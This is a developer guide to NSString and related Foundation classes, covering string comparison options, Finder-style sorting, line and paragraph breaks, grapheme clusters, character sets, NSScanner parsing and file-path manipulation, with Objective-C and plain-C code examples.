The compare:... methods return the lexical ordering of the receiver and the supplied string. Several other methods allow you to determine whether two strings are equal or whether one is the prefix or suffix of another, but they don't have variants that allow you to specify search options or ranges.
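A purely lexical ordering compares strings character by character, so "string10" sorts before "string2". A numeric-aware ordering instead treats each run of digits as a number. The plain-C sketch below contrasts the two on byte strings. It illustrates the idea only and is not Foundation's algorithm: it ignores locale, case, and Unicode equivalence, and the function names are hypothetical. The return values -1, 0, and 1 mirror NSOrderedAscending, NSOrderedSame, and NSOrderedDescending.

```c
#include <ctype.h>
#include <string.h>

static int sign(int v) { return (v > 0) - (v < 0); }

/* Byte-by-byte ordering. */
int lexical_compare(const char *a, const char *b) {
    return sign(strcmp(a, b));
}

/* Ordering in which runs of decimal digits compare by numeric value. */
int numeric_compare(const char *a, const char *b) {
    while (*a && *b) {
        if (isdigit((unsigned char)*a) && isdigit((unsigned char)*b)) {
            while (*a == '0') a++;          /* leading zeros carry no value */
            while (*b == '0') b++;
            size_t la = 0, lb = 0;
            while (isdigit((unsigned char)a[la])) la++;
            while (isdigit((unsigned char)b[lb])) lb++;
            if (la != lb) return la < lb ? -1 : 1;  /* more digits: larger */
            int c = strncmp(a, b, la);      /* same length: digitwise */
            if (c != 0) return sign(c);
            a += la;
            b += lb;
        } else {
            if (*a != *b)
                return (unsigned char)*a < (unsigned char)*b ? -1 : 1;
            a++;
            b++;
        }
    }
    if (*a) return 1;
    if (*b) return -1;
    return 0;
}
```

With these definitions, lexical_compare("string10", "string2") returns -1, whereas numeric_compare("string10", "string2") returns 1.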
The simplest method you can use to compare strings is compare:. This is the same as invoking compare:options:range: with no options and the receiver's full extent as the range. If you want to specify comparison options (NSCaseInsensitiveSearch, NSLiteralSearch, or NSNumericSearch) you can use compare:options:; if you want to specify a locale you can use compare:options:range:locale:. NSString also provides various convenience methods to allow you to perform common comparisons without the need to specify ranges and options directly, for example caseInsensitiveCompare: and localizedCompare:.

Important: For user-visible sorted lists, you should always use localized comparisons. Thus typically instead of compare: or caseInsensitiveCompare: you should use localizedCompare: or localizedCaseInsensitiveCompare:.

If you want to compare strings to order them in the same way as they're presented in Finder, you should use compare:options:range:locale: with the user's locale and the following options: NSCaseInsensitiveSearch, NSNumericSearch, NSWidthInsensitiveSearch, and NSForcedOrderingSearch. For an example, see "Sorting strings like Finder".

Search and Comparison Options

Several of the search and comparison methods take an "options" argument. This is a bit mask that adds further constraints to the operation. You create the mask by combining the following options (not all options are available for every method):

Search option              Effect
NSCaseInsensitiveSearch    Ignores case distinctions among characters.
NSLiteralSearch            Performs a byte-for-byte comparison. Differing literal sequences (such as composed character sequences) that would otherwise be considered equivalent are considered not to match. Using this option can speed some operations dramatically.
NSBackwardsSearch          Performs searching from the end of the range toward the beginning.
NSAnchoredSearch           Performs searching only on characters at the beginning or end of the range. No match at the beginning or end means nothing is found, even if a matching sequence of characters occurs elsewhere in the string.
NSNumericSearch            When used with the compare:options: methods, groups of numbers are treated as a numeric value for the purpose of comparison. For example, Filename9.txt < Filename20.txt < Filename100.txt.

Search and comparison are currently performed as if the NSLiteralSearch option were specified.

Examples

Case-Insensitive Search for Prefix and Suffix

NSString provides the methods hasPrefix: and hasSuffix: that you can use to find an exact match for a prefix or suffix. The following example illustrates how you can use rangeOfString:options: with a combination of options to perform case-insensitive searches.

    NSString *searchString = @"age";

    NSString *beginsTest = @"Agencies";
    NSRange prefixRange = [beginsTest rangeOfString:searchString
        options:(NSAnchoredSearch | NSCaseInsensitiveSearch)];
    // prefixRange = {0, 3}

    NSString *endsTest = @"BRICOLAGE";
    NSRange suffixRange = [endsTest rangeOfString:searchString
        options:(NSAnchoredSearch | NSCaseInsensitiveSearch | NSBackwardsSearch)];
    // suffixRange = {6, 3}

Comparing Strings

The following examples illustrate the use of various string comparison methods and associated options. The first shows the simplest comparison method.
    NSString *string1 = @"string1";
    NSString *string2 = @"string2";
    NSComparisonResult result;
    result = [string1 compare:string2];
    // result = -1 (NSOrderedAscending)

You can compare strings numerically using the NSNumericSearch option:

    NSString *string10 = @"string10";
    NSString *string2 = @"string2";
    NSComparisonResult result;

    result = [string10 compare:string2];
    // result = -1 (NSOrderedAscending)

    result = [string10 compare:string2 options:NSNumericSearch];
    // result = 1 (NSOrderedDescending)

You can use convenience methods (caseInsensitiveCompare: and localizedCaseInsensitiveCompare:) to perform case-insensitive comparisons:

    NSString *string_a = @"Aardvark";
    NSString *string_A = @"AARDVARK";

    result = [string_a compare:string_A];
    // result = 1 (NSOrderedDescending)

    result = [string_a caseInsensitiveCompare:string_A];
    // result = 0 (NSOrderedSame)
    // equivalent to [string_a compare:string_A options:NSCaseInsensitiveSearch]

Sorting strings like Finder

To sort strings the way Finder does in OS X v10.6 and later, use the localizedStandardCompare: method. It should be used whenever file names or other strings are presented in lists and tables where Finder-like sorting is appropriate. The exact behavior of this method is different under different localizations, so clients should not depend on the exact sorting order of the strings.

The following example shows another implementation of similar functionality, comparing strings to order them in the same way as they're presented in Finder, and it also shows how to sort the array of strings. First, define a sorting function that includes the relevant comparison options (for efficiency, pass the user's locale as the context so that it is only looked up once).
    // sortedArrayUsingFunction:context: expects a function that returns NSInteger.
    NSInteger finderSortWithLocale(id string1, id string2, void *locale)
    {
        static NSStringCompareOptions comparisonOptions =
            NSCaseInsensitiveSearch | NSNumericSearch |
            NSWidthInsensitiveSearch | NSForcedOrderingSearch;

        NSRange string1Range = NSMakeRange(0, [string1 length]);

        // The __bridge cast is required when compiling with ARC.
        return [string1 compare:string2
            options:comparisonOptions
            range:string1Range
            locale:(__bridge NSLocale *)locale];
    }

You pass the function as a parameter to sortedArrayUsingFunction:context: with the user's current locale as the context:

    NSArray *stringsArray = @[@"string 1",
                              @"String 21",
                              @"string 12",
                              @"String 11",
                              @"String 02"];

    NSArray *sortedArray = [stringsArray
        sortedArrayUsingFunction:finderSortWithLocale
        context:(__bridge void *)[NSLocale currentLocale]];

    // sortedArray contains { "string 1", "String 02", "String 11", "string 12", "String 21" }

Paragraphs and Line Breaks

This article describes how line and paragraph separators are defined and how you can separate a string by paragraph.

Line and Paragraph Separator Characters

There are a number of ways in which a line or paragraph break may be represented. Historically \n, \r, and \r\n have been used. Unicode defines an unambiguous paragraph separator, U+2029 (for which Cocoa provides the constant NSParagraphSeparatorCharacter), and an unambiguous line separator, U+2028 (for which Cocoa provides the constant NSLineSeparatorCharacter).

In the Cocoa text system, the NSParagraphSeparatorCharacter is treated consistently as a paragraph break, and NSLineSeparatorCharacter is treated consistently as a line break that is not a paragraph break, that is, a line break within a paragraph. However, in other contexts, there are few guarantees as to how these characters will be treated. POSIX-level software, for example, often recognizes only \n as a break.
Some older Macintosh software recognizes only \r, and some Windows software recognizes only \r\n. Often there is no distinction between line and paragraph breaks.

Which line or paragraph break character you should use depends on how your data may be used and on what platforms. The Cocoa text system recognizes \n, \r, or \r\n all as paragraph breaks, equivalent to NSParagraphSeparatorCharacter. When it inserts paragraph breaks, for example with insertNewline:, it uses \n. Ordinarily NSLineSeparatorCharacter is used only for breaks that are specifically line breaks and not paragraph breaks, for example in insertLineBreak:, or for representing HTML <br> elements.

If your breaks are specifically intended as line breaks and not paragraph breaks, then you should typically use NSLineSeparatorCharacter. Otherwise, you may use \n, \r, or \r\n depending on what other software is likely to process your text. The default choice for Cocoa is usually \n.

Separating a String "by Paragraph"

A common approach to separating a string "by paragraph" is simply to use:

    NSArray *arr = [myString componentsSeparatedByString:@"\n"];

This, however, ignores the fact that there are a number of other ways in which a paragraph or line break may be represented in a string: \r, \r\n, or Unicode separators. Instead you can use methods, such as lineRangeForRange: or getParagraphStart:end:contentsEnd:forRange:, that take into account the variety of possible line terminations, as illustrated in the following example.

    NSString *string = /* assume this exists */;
    NSUInteger length = [string length];
    NSUInteger paraStart = 0, paraEnd = 0, contentsEnd = 0;
    NSMutableArray *array = [NSMutableArray array];
    NSRange currentRange;
    while (paraEnd < length) {
        // Each call finds the paragraph that begins at paraEnd.
        [string getParagraphStart:&paraStart end:&paraEnd
            contentsEnd:&contentsEnd forRange:NSMakeRange(paraEnd, 0)];
        // contentsEnd excludes the terminator, so the substring does too.
        currentRange = NSMakeRange(paraStart, contentsEnd - paraStart);
        [array addObject:[string substringWithRange:currentRange]];
    }

Characters and Grapheme Clusters

It's common to think of a string as a sequence of characters, but when working with NSString objects, or with Unicode strings in general, in most cases it is better to deal with substrings rather than with individual characters. The reason for this is that what the user perceives as a character in text may in many cases be represented by multiple characters in the string.
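One concrete source of this mismatch is the UTF-16 encoding itself: a code point above U+FFFF occupies two 16-bit units. The plain-C sketch below shows the standard UTF-16 encoding arithmetic. The function name utf16_encode is hypothetical, and the code is an illustration rather than anything NSString or CFString exposes in this form.

```c
#include <stddef.h>
#include <stdint.h>

/* Encodes one Unicode code point as UTF-16. Writes one or two units to out
   and returns how many were written, or 0 if cp is not a valid scalar value
   (above U+10FFFF, or inside the reserved surrogate range). */
size_t utf16_encode(uint32_t cp, uint16_t out[2]) {
    if (cp > 0x10FFFF || (cp >= 0xD800 && cp <= 0xDFFF)) return 0;
    if (cp < 0x10000) {
        out[0] = (uint16_t)cp;                   /* fits in a single unit */
        return 1;
    }
    cp -= 0x10000;                               /* 20 bits remain */
    out[0] = (uint16_t)(0xD800 + (cp >> 10));    /* high half: top 10 bits */
    out[1] = (uint16_t)(0xDC00 + (cp & 0x3FF));  /* low half: bottom 10 bits */
    return 2;
}
```

For example, U+0041 ("A") encodes as the single unit 0x0041, while U+1F600 encodes as the two units 0xD83D 0xDE00, so a string that holds only that one character reports a length of 2.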
NSString has a large inventory of methods for properly handling Unicode strings, which in general make Unicode compliance easy, but there are a few precautions you should observe.

NSString objects are conceptually UTF-16 with platform endianness. That doesn't necessarily imply anything about their internal storage mechanism; what it means is that NSString lengths, character indexes, and ranges are expressed in terms of UTF-16 units, and that the term "character" in NSString method names refers to 16-bit platform-endian UTF-16 units. This is a common convention for string objects. In most cases, clients don't need to be overly concerned with this; as long as you are dealing with substrings, the precise interpretation of the range indexes is not necessarily significant.

The vast majority of Unicode code points used for writing living languages are represented by single UTF-16 units. However, some less common Unicode code points are represented in UTF-16 by surrogate pairs. A surrogate pair is a sequence of two UTF-16 units, taken from specific reserved ranges, that together represent a single Unicode code point. CFString has functions for converting between surrogate pairs and the UTF-32 representation of the corresponding Unicode code point. When dealing with NSString objects, one constraint is that substring boundaries usually should not separate the two halves of a surrogate pair. This is generally automatic for ranges returned from most Cocoa methods, but if you are constructing substring ranges yourself you should keep this in mind.

However, this is not the only constraint you should consider. In many writing systems, a single character may be composed of a base letter plus an accent or other decoration. The number of possible letters and accents precludes Unicode from representing each combination as a single code point, so in general such combinations are represented by a base character followed by one or more combining marks.
For compatibility reasons, Unicode does have single code points for a number of the most common combinations; these are referred to as precomposed forms, and Unicode normalization transformations can be used to convert between precomposed and decomposed representations. However, even if a string is fully precomposed, there are still many combinations that must be represented using a base character and combining marks. For most text processing, substring ranges should be arranged so that their boundaries do not separate a base character from its associated combining marks.

In addition, there are writing systems in which characters represent a combination of parts that are more complicated than accent marks. In Korean, for example, a single Hangul syllable can be composed of two or three subparts known as jamo. In the Indic and Indic-influenced writing systems common throughout South and Southeast Asia, single written characters often represent combinations of consonants, vowels, and marks such as viramas, and the Unicode representations of these writing systems often use code points for these individual parts, so that a single character may be composed of multiple code points. For most text processing, substring ranges should also be arranged so that their boundaries do not separate the jamo in a single Hangul syllable, or the components of an Indic consonant cluster.

In general, these combinations (surrogate pairs, base characters plus combining marks, Hangul jamo, and Indic consonant clusters) are referred to as grapheme clusters. In order to take them into account, you can use NSString's rangeOfComposedCharacterSequencesForRange: or rangeOfComposedCharacterSequenceAtIndex: methods, or CFStringGetRangeOfComposedCharactersAtIndex.
These can be used to adjust string indexes or substring ranges so that they fall on grapheme cluster boundaries, taking into account all of the constraints mentioned above. These methods should be the default choice for programmatically determining the boundaries of user-perceived characters.

In some cases, Unicode algorithms deal with multiple characters in ways that go beyond even grapheme cluster boundaries. Unicode casing algorithms may convert a single character into multiple characters when going from lowercase to uppercase; for example, the standard uppercase equivalent of the German character "ß" is the two-letter sequence "SS". Localized collation algorithms in many languages consider multiple-character sequences as single units; for example, the sequence "ch" is treated as a single letter for sorting purposes in some European languages. In order to deal properly with cases like these, it is important to use standard NSString methods for such operations as casing, sorting, and searching, and to use them on the entire string to which they are to apply. Use NSString methods such as lowercaseString, uppercaseString, capitalizedString, compare: and its variants, rangeOfString: and its variants, and rangeOfCharacterFromSet: and its variants, or their CFString equivalents. These all take into account the complexities of Unicode string processing, and the searching and sorting methods in particular have many options to control the types of equivalences they are to recognize.

In some less common cases, it may be necessary to tailor the definition of grapheme clusters to a particular need. The issues involved in determining and tailoring grapheme cluster boundaries are covered in detail in Unicode Standard Annex #29, which gives a number of examples and some algorithms. The Unicode standard in general is the best source for information about Unicode algorithms and the considerations involved in processing Unicode strings.
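To make the idea of adjusting an index to a cluster boundary concrete, here is a deliberately simplified plain-C sketch. It handles only two of the cases described above: surrogate pairs, and combining marks from the single block U+0300 to U+036F. It is far less complete than Unicode Standard Annex #29 or the NSString methods, and the name cluster_start is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

static int is_high_surrogate(uint16_t u) { return u >= 0xD800 && u <= 0xDBFF; }
static int is_low_surrogate(uint16_t u)  { return u >= 0xDC00 && u <= 0xDFFF; }
/* Simplifying assumption: only the Combining Diacritical Marks block. */
static int is_combining_mark(uint16_t u) { return u >= 0x0300 && u <= 0x036F; }

/* Moves index backward until it no longer points into the middle of a
   surrogate pair or at a combining mark that belongs to an earlier base
   character. Returns len if index is at or past the end. */
size_t cluster_start(const uint16_t *s, size_t len, size_t index) {
    if (index >= len) return len;
    while (index > 0) {
        uint16_t u = s[index];
        if (is_combining_mark(u)) {
            index--;              /* mark attaches to what precedes it */
        } else if (is_low_surrogate(u) && is_high_surrogate(s[index - 1])) {
            index--;              /* step back onto the high half */
        } else {
            break;
        }
    }
    return index;
}
```

Given the units { 0x0065, 0x0301, 0xD83D, 0xDE00, 0x0078 }, which hold "e" plus a combining acute accent, one surrogate pair, and "x", the indexes 1 and 3 are moved back to 0 and 2 respectively, while 0, 2, and 4 are already on boundaries and are returned unchanged.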
If you are interested in grapheme cluster boundaries from the point of view of cursor movement and insertion point positioning, and you are using the Cocoa text system, you should know that on OS X v10.5 and later, NSLayoutManager has API support for determining insertion point positions within a line of text as it is laid out. Note that insertion point boundaries are not identical to glyph boundaries; a ligature glyph in some cases, such as an "fi" ligature in Latin script, may require an internal insertion point on a user-perceived character boundary. See Cocoa Text Architecture Guide for more information.

Character Sets

An NSCharacterSet object represents a set of Unicode characters. NSString and NSScanner objects use NSCharacterSet objects to group characters together for searching operations, so that they can find any of a particular set of characters during a search.

Character Set Basics

A character set object represents a set of Unicode characters. Character sets are represented by instances of a class cluster. The cluster's two public classes, NSCharacterSet and NSMutableCharacterSet, declare the programmatic interface for immutable and mutable character sets, respectively. An immutable character set is defined when it is created and subsequently cannot be changed. A mutable character set can be changed after it's created.

A character set object doesn't perform any tasks; it simply holds a set of character values to limit operations on strings. The NSString and NSScanner classes define methods that take NSCharacterSet objects as arguments to find any of several characters. For example, this code excerpt finds the range of the first uppercase letter in myString:
    NSString *myString = @"some text in an NSString...";
    NSCharacterSet *characterSet = [NSCharacterSet uppercaseLetterCharacterSet];
    NSRange letterRange = [myString rangeOfCharacterFromSet:characterSet];

After this fragment executes, letterRange.location is equal to the index of the first "N" in "NSString". If the first letter of the string were "S", then letterRange.location would be 0.

Creating Character Sets

NSCharacterSet defines class methods that return commonly used character sets, such as letters (uppercase or lowercase), decimal digits, whitespace, and so on. These "standard" character sets are always immutable, even if created by sending a message to NSMutableCharacterSet. See "Standard Character Sets and Unicode Definitions" for more information on standard character sets.

You can use a standard character set as a starting point for building a custom set by making a mutable copy of it and changing that. (You can also start from scratch by creating a mutable character set with alloc and init and adding characters to it.)
For example, this fragment creates a character set containing letters, digits, and basic punctuation:

    NSMutableCharacterSet *workingSet = [[NSCharacterSet alphanumericCharacterSet] mutableCopy];
    [workingSet addCharactersInString:@";:,."];
    NSCharacterSet *finalCharacterSet = [workingSet copy];

To define a custom character set using Unicode code points, use code similar to the following fragment (which creates a character set including the form feed and line separator characters):

    UniChar chars[] = {0x000C, 0x2028};
    NSString *string = [[NSString alloc] initWithCharacters:chars
        length:sizeof(chars) / sizeof(UniChar)];
    NSCharacterSet *characterSet = [NSCharacterSet characterSetWithCharactersInString:string];

Performance considerations

Because character sets often participate in performance-critical code, you should be aware of the aspects of their use that can affect the performance of your application. Mutable character sets are generally much more expensive than immutable character sets. They consume more memory and are costly to invert (an operation often performed in scanning a string). Because of this, you should follow these guidelines:

● Create as few mutable character sets as possible.
● Cache character sets (in a global dictionary, perhaps) instead of continually recreating them.
● When creating a custom set that doesn't need to change after creation, make an immutable copy of the final character set for actual use, and dispose of the working mutable character set. Alternatively, create a character set file as described in "Creating a character set file" and store it in your application's main bundle.
● Similarly, avoid archiving character set objects; store them in character set files instead. Archiving can result in a character set being duplicated in different archive files, resulting in wasted disk space and duplicates in memory for each separate archive read.

Creating a character set file

If your application frequently uses a custom character set, you should save its definition in a resource file and load that instead of explicitly adding individual characters each time you need to create the set. You can save a character set by getting its bitmap representation (an NSData object) and saving that object to a file:

    NSData *charSetRep = [finalCharacterSet bitmapRepresentation];
    NSURL *dataURL = <#URL for character set#>;
    NSError *error;
    BOOL result = [charSetRep writeToURL:dataURL options:NSDataWritingAtomic error:&error];

By convention, character set filenames use the extension .bitmap. If you intend for others to use your character set files, you should follow this convention. To read a character set file with a .bitmap extension, simply use the characterSetWithContentsOfFile: method.

Standard Character Sets and Unicode Definitions

The standard character sets, such as that returned by letterCharacterSet, are formally defined in terms of the normative and informative categories established by the Unicode standard, such as Uppercase Letter, Combining Mark, and so on. The formal definition of a standard character set is in most cases given as one or more of the categories defined in the standard. For example, the set returned by lowercaseLetterCharacterSet includes all characters in the normative category Lowercase Letters, while the set returned by letterCharacterSet includes the characters in all of the Letter categories.

Note that the definitions of the categories themselves may change with new versions of the Unicode standard. You can download the files that define category membership from http://www.unicode.org/.

Scanners

An NSScanner object scans the characters of an NSString object, typically interpreting the characters and converting them into number and string values.
You assign the scanner’s string on creation, and the scanner progresses through the characters of that string from beginning to end as you request items.

Creating a Scanner

NSScanner is a class cluster with a single public class, NSScanner. Generally, you instantiate a scanner object by invoking the class method scannerWithString: or localizedScannerWithString:. Either method returns a scanner object initialized with the string you pass to it. The newly created scanner starts at the beginning of its string. You scan components using the scan... methods such as scanInt:, scanDouble:, and scanString:intoString:. If you are scanning multiple lines, you typically create a while loop that continues until the scanner is at the end of the string, as illustrated in the following code fragment:

    float aFloat;
    NSScanner *theScanner = [NSScanner scannerWithString:aString];
    while ([theScanner isAtEnd] == NO) {
        [theScanner scanFloat:&aFloat];
        // implementation continues...
    }

You can configure a scanner to consider or ignore case using the setCaseSensitive: method. By default a scanner ignores case.

Using a Scanner

Scan operations start at the scan location and advance the scanner to just past the last character in the scanned value representation (if any). For example, after scanning an integer from the string “137 small cases of bananas”, a scanner’s location will be 3, indicating the space immediately after the number. Often you need to advance the scan location to skip characters in which you are not interested. You can change the implicit scan location with the setScanLocation: method to skip ahead a certain number of characters (you can also use the method to rescan a portion of the string after an error). Typically, however, you either want to skip characters from a particular character set, scan past a specific string, or scan up to a specific string.
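The scan-location behavior described above can be sketched roughly as follows. This is a minimal illustration, not a definitive implementation: the two helper functions, ScanLocationAfterLeadingInteger and SkipAhead, are hypothetical names introduced here and are not part of Foundation. They rely only on the scanInteger:, scanLocation, setScanLocation:, and string methods of NSScanner.

```objc
#import <Foundation/Foundation.h>

// Hypothetical helper (not part of Foundation): scans a leading integer
// from `text`, stores it in *outValue when outValue is non-NULL, and
// returns the scan location immediately after the scanned digits.
// Returns NSNotFound if the string does not start with an integer.
static NSUInteger ScanLocationAfterLeadingInteger(NSString *text, NSInteger *outValue) {
    NSScanner *scanner = [NSScanner scannerWithString:text];
    NSInteger value = 0;
    if (![scanner scanInteger:&value]) {
        return NSNotFound;
    }
    if (outValue != NULL) {
        *outValue = value;
    }
    return [scanner scanLocation];
}

// Hypothetical helper: moves the scan location `count` characters ahead,
// clamped to the end of the string so that setScanLocation: is never
// given an index beyond the string's length.
static void SkipAhead(NSScanner *scanner, NSUInteger count) {
    NSUInteger length = [[scanner string] length];
    NSUInteger target = [scanner scanLocation] + count;
    [scanner setScanLocation:MIN(target, length)];
}
```

For the string “137 small cases of bananas”, the first helper is expected to store 137 and return 3, the index of the space immediately after the number. Clamping in SkipAhead is a design choice made for this sketch; code that prefers to treat an out-of-range skip as an error could check the target against the string length instead.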
You can configure a scanner to skip a set of characters with the setCharactersToBeSkipped: method. A scanner ignores characters to be skipped at the beginning of any scan operation. Once it finds a scannable character, however, it includes all characters matching the request. Scanners skip whitespace and newline characters by default. Note that case is always considered with regard to characters to be skipped. To skip all English vowels, for example, you must set the characters to be skipped to those in the string “AEIOUaeiou”.

If you want to read content from the current location up to a particular string, you can use scanUpToString:intoString: (you can pass NULL as the second argument if you simply want to skip the intervening characters). For example, given the following string:

    137 small cases of bananas

you can find the type of container and number of containers using scanUpToString:intoString: as shown in the following example.

    NSString *bananas = @"137 small cases of bananas";
    NSString *separatorString = @" of";

    NSScanner *aScanner = [NSScanner scannerWithString:bananas];

    NSInteger anInteger;
    [aScanner scanInteger:&anInteger];
    NSString *container;
    [aScanner scanUpToString:separatorString intoString:&container];

It is important to note that the search string (separatorString) is " of". By default a scanner ignores whitespace, so the space character after the integer is ignored. Once the scanner begins to accumulate characters, however, all characters are added to the output string until the search string is reached. Thus if the search string is "of" (no space before), the first value of container is “small cases ” (includes the space following); if the search string is " of" (with a space before), the first value of container is “small cases” (no space following).

After scanning up to a given string, the scan location is the beginning of that string.
If you want to scan past that string, you must therefore first scan in the string you scanned up to. The following code fragment illustrates how to skip past the search string in the previous example and determine the type of product in the container. Note the use of substringFromIndex: to in effect scan up to the end of a string.

    [aScanner scanString:separatorString intoString:NULL];
    NSString *product;
    product = [[aScanner string] substringFromIndex:[aScanner scanLocation]];
    // could also use:
    // product = [bananas substringFromIndex:[aScanner scanLocation]];

Example

Suppose you have a string containing lines such as:

    Product: Acme Potato Peeler; Cost: 0.98 73
    Product: Chef Pierre Pasta Fork; Cost: 0.75 19
    Product: Chef Pierre Colander; Cost: 1.27 2

The following example uses alternating scan operations to extract the product names and costs (costs are read as a float for simplicity’s sake), skipping the expected substrings “Product:” and “Cost:”, as well as the semicolon. Note that because a scanner skips whitespace and newlines by default, the loop does no special processing for them (in particular there is no need to do additional whitespace processing to retrieve the final integer).

    NSString *string = @"Product: Acme Potato Peeler; Cost: 0.98 73\n\
    Product: Chef Pierre Pasta Fork; Cost: 0.75 19\n\
    Product: Chef Pierre Colander; Cost: 1.27 2\n";

    NSCharacterSet *semicolonSet;
    NSScanner *theScanner;

    NSString *PRODUCT = @"Product:";
    NSString *COST = @"Cost:";

    NSString *productName;
    float productCost;
    NSInteger productSold;

    semicolonSet = [NSCharacterSet characterSetWithCharactersInString:@";"];
    theScanner = [NSScanner scannerWithString:string];

    while ([theScanner isAtEnd] == NO) {
        if ([theScanner scanString:PRODUCT intoString:NULL] &&
            [theScanner scanUpToCharactersFromSet:semicolonSet intoString:&productName] &&
            [theScanner scanString:@";" intoString:NULL] &&
            [theScanner scanString:COST intoString:NULL] &&
            [theScanner scanFloat:&productCost] &&
            [theScanner scanInteger:&productSold]) {
            NSLog(@"Sales of %@: $%1.2f", productName, productCost * productSold);
        }
    }

Localization

A scanner bases some of its scanning behavior on a locale, which specifies a language and conventions for value representations. NSScanner uses only the locale’s definition for the decimal separator (given by the key named NSDecimalSeparator). You can create a scanner with the user’s locale by using localizedScannerWithString:, or set the locale explicitly using setLocale:. If you use a method that doesn’t specify a locale, the scanner assumes the default locale values.

String Representations of File Paths

NSString provides a rich set of methods for manipulating strings as file-system paths. You can extract a path’s directory, filename, and extension, expand a tilde expression (such as “~me”) or create one for the user’s home directory, and clean up paths containing symbolic links, redundant slashes, and references to “.” (current directory) and “..” (parent directory).

Note: Where possible, you should use instances of NSURL to represent paths, because the operating system deals with URLs more efficiently than with string representations of paths.

Representing a Path

NSString represents paths generically with ‘/’ as the path separator and ‘.’ as the extension separator. Methods that accept strings as path arguments convert these generic representations to the proper system-specific form as needed.
On systems with an implicit root directory, absolute paths begin with a path separator or with a tilde expression (“~/...” or “~user/...”). Where a device must be specified, you can do that yourself (introducing a system dependency) or allow the string object to add a default device.

You can create a standardized representation of a path using stringByStandardizingPath. This performs a number of tasks including:

● Expansion of an initial tilde expression;
● Reduction of empty components and references to the current directory (“//” and “/./”) to single path separators;
● In absolute paths, resolution of references to the parent directory (“..”) to the real parent directory;

for example:

    NSString *path = @"/usr/bin/./grep";
    NSString *standardizedPath = [path stringByStandardizingPath];
    // standardizedPath: /usr/bin/grep

    path = @"~me";
    standardizedPath = [path stringByStandardizingPath];
    // standardizedPath (assuming conventional naming scheme): /Users/Me

    path = @"/usr/include/objc/..";
    standardizedPath = [path stringByStandardizingPath];
    // standardizedPath: /usr/include

    path = @"/private/usr/include";
    standardizedPath = [path stringByStandardizingPath];
    // standardizedPath: /usr/include

User Directories

The following examples illustrate how you can use NSString’s path utilities and other Cocoa functions to get the user directories.
    // Assuming that users’ home directories are stored in /Users

    NSString *meHome = [@"~me" stringByExpandingTildeInPath];
    // meHome = @"/Users/me"

    NSString *mePublic = [@"~me/Public" stringByExpandingTildeInPath];
    // mePublic = @"/Users/me/Public"

You can find the home directory for the current user and for a given user with NSHomeDirectory and NSHomeDirectoryForUser respectively:

    NSString *currentUserHomeDirectory = NSHomeDirectory();
    NSString *meHomeDirectory = NSHomeDirectoryForUser(@"me");

Note that you should typically use the function NSSearchPathForDirectoriesInDomains to locate standard directories for the current user. For example, instead of:

    NSString *documentsDirectory =
        [NSHomeDirectory() stringByAppendingPathComponent:@"Documents"];

you should use:

    NSString *documentsDirectory;
    NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
    if ([paths count] > 0) {
        documentsDirectory = [paths objectAtIndex:0];
    }

Path Components

NSString provides a rich set of methods for manipulating strings as file-system paths, for example:

pathExtension
    Interprets the receiver as a path and returns the receiver’s extension, if any.
stringByDeletingPathExtension
    Returns a new string made by deleting the extension (if any, and only the last) from the receiver.
stringByDeletingLastPathComponent
    Returns a new string made by deleting the last path component from the receiver, along with any final path separator.

Using these and related methods described in NSString Class Reference, you can extract a path’s directory, filename, and extension, as illustrated by the following examples.
    NSString *documentPath = @"~me/Public/Demo/readme.txt";

    NSString *documentDirectory = [documentPath stringByDeletingLastPathComponent];
    // documentDirectory = @"~me/Public/Demo"

    NSString *documentFilename = [documentPath lastPathComponent];
    // documentFilename = @"readme.txt"

    NSString *documentExtension = [documentPath pathExtension];
    // documentExtension = @"txt"

File Name Completion

You can find possible expansions of file names using completePathIntoString:caseSensitive:matchesIntoArray:filterTypes:. For example, given a directory ~/Demo that contains the following files:

    ReadMe.txt
    readme.html
    readme.rtf
    recondite.txt
    test.txt

you can find all possible completions for the path ~/Demo/r as follows:

    NSString *partialPath = @"~/Demo/r";
    NSString *longestCompletion;
    NSArray *outputArray;

    NSUInteger allMatches = [partialPath completePathIntoString:&longestCompletion
                                                  caseSensitive:NO
                                               matchesIntoArray:&outputArray
                                                    filterTypes:nil];
    // allMatches = 3
    // longestCompletion = @"~/Demo/re"
    // outputArray = (@"~/Demo/readme.html", @"~/Demo/readme.rtf", @"~/Demo/recondite.txt")

You can find possible completions for the path ~/Demo/r that have an extension “.txt” or “.rtf” as follows:

    NSArray *filterTypes = @[@"txt", @"rtf"];

    NSUInteger textMatches = [partialPath completePathIntoString:&longestCompletion
                                                   caseSensitive:NO
                                                matchesIntoArray:&outputArray
                                                     filterTypes:filterTypes];
    // textMatches = 2
    // longestCompletion = @"~/Demo/re"
    // outputArray = (@"~/Demo/readme.rtf", @"~/Demo/recondite.txt")

Drawing Strings

You can draw string objects directly in a focused NSView using methods such as drawAtPoint:withAttributes: (to draw a string with multiple attributes, such as multiple text fonts, you must use an NSAttributedString object).
These methods are described briefly in “Text” in Cocoa Drawing Guide. The simple methods, however, are designed for drawing small amounts of text or text that is only drawn rarely; they create and dispose of various supporting objects every time you call them. To draw strings repeatedly, it is more efficient to use NSLayoutManager, as described in “Drawing Strings”. For an overview of the Cocoa text system, of which NSLayoutManager is a part, see Cocoa Text Architecture Guide.

Document Revision History

This table describes the changes to String Programming Guide.

Date        Notes
2012-07-17  Updated code snippets to adopt new Objective-C features.
2012-06-11  Corrected string constant character set to UTF-8. Added guidance about using localizedStandardCompare: for Finder-like sorting. Added caveat to avoid using %s with RTL languages. Revised "String Format Specifiers" article.
2009-10-15  Added links to Cocoa Core Competencies.
2008-10-15  Added new article on character clusters; updated list of string format specifiers.
2007-10-18  Corrected minor typographical errors.
2007-07-10  Added notes regarding NSInteger and NSUInteger to "String Format Specifiers".
2007-03-06  Corrected minor typographical errors.
2007-02-08  Corrected sentence fragments and improved the example in "Scanners."
2006-12-05  Added code samples to illustrate searching and path manipulation.
2006-11-07  Made minor revisions to "Scanners" article.
2006-10-03  Added links to path manipulation methods.
2006-06-28  Corrected typographical errors.
2006-05-23  Added a new article, "Reading Strings From and Writing Strings To Files and URLs"; significantly updated "Creating and Converting Strings."
2006-01-10  Included “Creating a Character Set” into “Character Sets” (page 33). Changed title from "Strings" to conform to reference consistency guidelines.
2004-06-28  Added “Formatting String Objects” (page 13) article. Added Data Formatting and the Core Foundation Strings programming topics to the introduction.
2004-02-06  Added information about custom Unicode character sets and retrieved missing code fragments in “Creating a Character Set”. Added information and cross-reference to “Drawing Strings” (page 44). Rewrote introduction and added an index.
